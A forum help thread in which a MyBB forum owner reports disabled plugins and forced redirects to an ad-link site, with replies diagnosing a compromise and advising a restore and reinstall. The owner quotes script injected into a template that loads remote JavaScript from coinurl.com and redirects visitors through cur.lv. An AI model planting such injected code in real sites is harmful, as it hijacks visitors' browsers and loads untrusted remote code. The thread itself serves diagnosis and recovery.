woke up and my website redirects and all mods disabled

[eddiekeyton]

I woke up today, and all of my mods were disabled. Now everytime I click on a forum to view the posts, it redirects me to a cur.lv website that has a skip ad in the top right? Any idea? Also all of my plugins were disabled. Now when i enabled them I have a couple with duplicate settings in the configuration. Is this a hack attempt? Any idea on how to fix this?

---

went searching through template files and under the "redirect" category in the template editors i found this code in the template REDIRECT>HEADERINCLUDE>

<script type="text/javascript" src="http://coinurl.com/script/jquery-latest.min.js"></script>
<script type="text/javascript" src="http://coinurl.com/script/jquery.cookie.js"></script>
<script type="text/javascript" src="http://coinurl.com/script/md5.js"></script>

<script type="text/javascript">
$(function() {
var id = "17f21641826c543661aa71544404b19e";

var url = encodeURIComponent(window.location.href);
var hash = CryptoJS.MD5(url);
if($.cookie('coinurl_' + hash) == null) {
var redirect = "http://cur.lv/redirect.php?id=" + id + "&url=" + url;
$.cookie('coinurl_' + hash, true, {expires: 1});
top.location.assign(redirect);
}
});

[itsmegogo]

Have you installed any plugin that converts links to cur.vl? If no, then yes your site may be have been compromised.

[Dannymh]

Looks to be hacked.

Can you advise the following?

- Version of myBB you have installed
- List all plugins that were installed

What you will need to do is restore the database, reprovision your server if you are on VPS, if not delete everything on the server to be safe and re-install myBB and everything else.

Otherwise restore from a backup and check the plugins you have installed against the list of known vulnerable plugins and remove any of those.

Also make sure you rename your Admin directory to something obscure

[effone]

Whats the problem removing all those js variables helping a javascript redirect?